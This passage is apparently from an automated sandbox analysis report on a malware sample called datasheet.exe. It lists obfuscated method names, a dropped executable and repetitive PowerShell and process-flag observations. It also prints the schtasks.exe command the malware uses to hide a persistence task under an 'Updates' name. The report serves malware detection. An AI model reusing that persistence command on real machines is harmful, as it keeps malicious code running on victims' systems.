                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, mEYI0ez9SpMLMxarLw.csHigh entropy of concatenated method names: 'Yhmw44wf2k', 'F3cw9vgl7F', 'O0RwkL6uyG', 'lelwRBdJjG', 'RxAwgMaB8q', 'R6xwU8LC6J', 'AlpwQI4Rsx', 'ymSwTWXpcl', 'rN5wmliVtT', 'HY6w1RlRW8'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, iU3GhDI5CUbqSQqDMK3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NxpWsrL3Pj', 'SZjWwBpqYO', 'zb9Wtpc5Wq', 'HTAWWW0Wlg', 'S5jWitBm1P', 'hxKWhP77nk', 'CR3WTMPchJ'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, nrIaPAZ4wK9qnJdwHt.csHigh entropy of concatenated method names: 'oCdlmv8FQs', 'zMYl1S4IM1', 'njMlMggGir', 'vKUl08U50I', 'TchluA3CPT', 'eVLl47xRr8', 'BIXlXcQBtE', 'w85l9r1vZr', 'wdZlkXeuES', 'qmBletjJpl'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, NylW7JUHhxb7j0BeHn.csHigh entropy of concatenated method names: 'jW1GTkRi5s', 'm37Gm5A6K7', 'E1LGMqn9fD', 'T7uG0THAcA', 'DWFG4Lx9bW', 'YcOGXtgK0X', 'E8OGkMnpSJ', 'URJGeFoqOp', 'NFVws7UwHHCDsTuLePZ', 'YJUiyeUyxhSkQVji6RR'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, Mi7lsy2FiRFrPwBMYi.csHigh entropy of concatenated method names: 's8AMIOlp7', 'k4i0kRmc8', 'utn4OFDo7', 'ctnXF7Uww', 'q9Ik37CJx', 'uLqeoMOXM', 'ov6FTTXodlihE8KlRO', 'bSKJVnZuTClaqxU1Lw', 'xGJpxQOfa', 'CcjwenRgD'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, vvxv4PEt7dXC6fXLp6.csHigh entropy of concatenated method names: 'jmhsR7B0Nq', 'Qjwsgsy55Z', 'U2qsyTmpWk', 'JawsUZqvRI', 'Q7RsQX2Q7e', 'G0KsjMsdQP', 'Pn0sHK8dsH', 'oynsaPJ0mD', 'mFxsZlZ5qg', 'sMLsAqNuc4'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, lv8H2d9G3Iqa4sEWPO.csHigh entropy of concatenated method names: 'NOGONB41Hw', 'crEOcwVKAZ', 'S4aOBNArYd', 'fs4OnD31Vr', 'uCfOSYSxoy', 'PMjO8TSh9o', 'BaiOKO2LZK', 'HUrOr6SRsh', 'D0ROE6V00Y', 'oeGO6UIvQn'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csHigh entropy of concatenated method names: 'ABZxbCf3WS', 'mPPxDJXcix', 'wx9xOn6FiO', 'TMJxohIScT', 'wAYxLpO1iY', 'g9DxGIYlep', 'fcgxlPniZk', 'p09xJfI4n0', 'J34xq3ln20', 'pb9xYMd5tJ'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, CPPmkRNFv5r53JLsmx.csHigh entropy of concatenated method names: 'asdCAeoAlX', 'fQ4CfVkDTF', 'HdoCNbo2Lm', 'aEDCc6WpUU', 'nE7Cguh8c5', 'QyMCyJGcBW', 'seVCURMk4s', 'y9MCQJuISG', 'HflCjfb7y2', 'MpGCHjOQCI'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, mSgYsTOti3cTYE17og.csHigh entropy of concatenated method names: 'Dispose', 'hgoIETqIgA', 'qQF2gkmhpX', 'LZ2FjVi7Ts', 'RtXI6EPNOi', 'P4IIzUwxGu', 'ProcessDialogKey', 'mnh2Pvxv4P', 't7d2IXC6fX', 'ip622OIErq'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, A9OsSD8vxAmBW3h63P.csHigh entropy of concatenated method names: 'KC5vrVPFJT', 'hRav6IPWjQ', 'dU5pPGwG2P', 'jPxpIKwIBv', 'x1uvFkx0Xf', 'KUmvfeMTdV', 'AXMv7p1vHj', 'cC2vNNkVkj', 'oaqvcqeOxn', 'vCovBQjBgS'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, b14PLreOyPL95jqE2G.csHigh entropy of concatenated method names: 'Ol9LuhSAQr', 'tenLXMKZnq', 'UFZoy9Rep3', 'J3woUst94d', 'kFcoQwCiQB', 'o63ojSZi33', 'hO2oHcn5Gs', 'r6toatOj7W', 'dJioZYYB70', 'kvuoAfyxW6'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, ATDn1PKadogoTqIgAc.csHigh entropy of concatenated method names: 'gHUsCBq44o', 'chNsvf2TdT', 'ghIssoDtQS', 'wojstBRpQ4', 'QI3sihY4aQ', 'pwpsTdiR2k', 'Dispose', 'k1XpD8qTIF', 'fgGpO3HveA', 'hWIpo8BOmN'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, gbqE9akykXACM5vvYv.csHigh entropy of concatenated method names: 'gkUo0VB7lo', 'AvIo4fb5VF', 't8ao9c8YHZ', 'pYjokhLLUZ', 'UjaoC2ggPn', 'JImo3DImZs', 'NI2ovh1Asu', 'SnCoplvhLa', 'AMsosxaMD7', 'krUowDr4fB'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, L4vAxKIIcAZoshGV9H7.csHigh entropy of concatenated method names: 'olww6doItx', 'IYewzR6syG', 'm4ktPnLi9S', 'mvCtIfaG4Q', 'dDlt2cNmxm', 'eIAtxrnEnC', 'JlKt5SDtxB', 'toptbPTuRS', 'zo0tDTTEwe', 'YGNtO0spAF'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, JLCJHyH6c0QTNYmk86.csHigh entropy of concatenated method names: 'jiOlDKKAgl', 'YwWlosEpSq', 'heBlGYUaPi', 'aiRG6SZHOa', 'p22GzyJCx7', 'h0hlPVjahu', 'yOwlIGLSSi', 'i44l2Xn9Df', 'og6lxhcNNo', 'cr0l50M4oG'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, pTw8yI7DDdtg6G8j6r.csHigh entropy of concatenated method names: 'DcIV9VeE8Y', 'JYtVka90eB', 'X3RVR3jAEc', 'LLBVg3C5Ua', 'b1ZVU1hZ35', 'uTMVQiJORf', 'nEnVHcKfOc', 'yo4Va3y0Y0', 'ln3VA0J0BP', 'H9mVFjwMHJ'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, wwpUJiBXK20C4PEluy.csHigh entropy of concatenated method names: 'ToString', 'H5y3F3J0xw', 'dm83gLbwJS', 'u6w3ylEn5D', 'IlU3Ulh6dL', 'M053QGPUo6', 'n4U3jsRRdu', 'fY53HGyZKQ', 'xMS3aqY5Z5', 'KUd3Zb3UGC'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, t0Ige75P2lbOS8wTrY.csHigh entropy of concatenated method names: 'bQYIlv8H2d', 'i3IIJqa4sE', 'LykIYXACM5', 'qvYIdv214P', 'KqEIC2GEvo', 'rWRI3RpNlT', 'wEaOyK2f8VqpLU5H30', 'icTEnfgwPcVEUjKfhK', 'TQ1IIeC9qk', 'DYmIxgK5Gl'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, YvopWRRRpNlTsh2H4Y.csHigh entropy of concatenated method names: 'm8ZGb1BEE7', 'VWhGOhix1R', 'XOyGLf0FTA', 'mXlGlUnvSF', 'DgPGJ3YhAY', 'wG8LSPDbJm', 'RcmL87LndG', 'uBeLKWhHMX', 'L3SLrQkmnG', 'KiLLEdlMbW'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, mEYI0ez9SpMLMxarLw.csHigh entropy of concatenated method names: 'Yhmw44wf2k', 'F3cw9vgl7F', 'O0RwkL6uyG', 'lelwRBdJjG', 'RxAwgMaB8q', 'R6xwU8LC6J', 'AlpwQI4Rsx', 'ymSwTWXpcl', 'rN5wmliVtT', 'HY6w1RlRW8'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, iU3GhDI5CUbqSQqDMK3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NxpWsrL3Pj', 'SZjWwBpqYO', 'zb9Wtpc5Wq', 'HTAWWW0Wlg', 'S5jWitBm1P', 'hxKWhP77nk', 'CR3WTMPchJ'
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, nrIaPAZ4wK9qnJdwHt.csHigh entropy of concatenated method names: 'oCdlmv8FQs', 'zMYl1S4IM1', 'njMlMggGir', 'vKUl08U50I', 'TchluA3CPT', 'eVLl47xRr8', 'BIXlXcQBtE', 'w85l9r1vZr', 'wdZlkXeuES', 'qmBletjJpl'
                    Source: C:\Users\user\Desktop\datasheet.exeFile created: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
